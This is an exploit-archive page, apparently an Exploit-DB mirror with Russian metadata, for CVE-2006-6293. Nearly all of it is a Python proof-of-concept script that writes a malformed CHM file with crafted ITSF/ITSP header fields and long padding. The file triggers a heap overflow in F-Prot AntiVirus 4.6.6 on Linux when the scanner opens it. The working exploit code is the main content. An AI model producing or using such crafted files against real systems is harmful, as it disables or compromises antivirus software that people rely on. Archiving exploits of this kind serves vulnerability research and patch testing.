Exploit F-Prot AntiVirus 4.6.6 - CHM Heap Overflow (PoC)

[Exploiter]

EDB-ID

2893

Проверка EDB

1. Пройдено

Автор

EVGENY LEGEROV

Тип уязвимости

DOS

Платформа

LINUX

CVE

cve-2006-6293

Дата публикации

2006-12-04

# fprot2.py - trivial proof of concept code for F-Prot 4.6.6 .CHM heap
# overflow
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# $ ./fprot2.py > 1.chm
# $ f-prot 1.chm

import sys
import struct

s=""
s+="ITSF"        # signature
s+=struct.pack("<L",3) # version
s+=struct.pack("<L",96) # header_len
s+=struct.pack("<L",1) # unknown
s+=struct.pack("<L",0x41424344) # last_modified
s+=struct.pack("<L",0x419) # lang_id
s+="A"*16 #dir_clsid
s+="B"*16 #stream_clsid
s+=struct.pack("<L",96) + "\x00" * 4 #sec0_offset
s+=struct.pack("<L",24) + "\x00" * 4 #sec0_len
s+=struct.pack("<L",120) + "\x00" *4 #dir_offset
s+=struct.pack("<L",4180) + "\x00" * 4 #dir_len
s+=struct.pack("<L",4300) + "\x00"*4 #data_offset
s+="A"*24
s+="ITSP"
s+=struct.pack("<L", 1) # version
s+=struct.pack("<L",0x54) # header_len
s+=struct.pack("<L", 0xa) # unknown
s+=struct.pack("<L",1000) # block_len - BUG?
s+=struct.pack("<L",2) # blockidx
s+=struct.pack("<L", 1) # index_depth
s+=struct.pack("<L", -1) # index_root
s+=struct.pack("<L",0) # index_head
s+=struct.pack("<L",0) # index_tail
s+=struct.pack("<L", -1) # unknown2
s+=struct.pack("<L",1) # num_blocks
s+=struct.pack("<L", 1033) # lang_id
s+="A"*32
s+="B"*10000

sys.stdout.write(s)

# milw0rm.com [2006-12-04]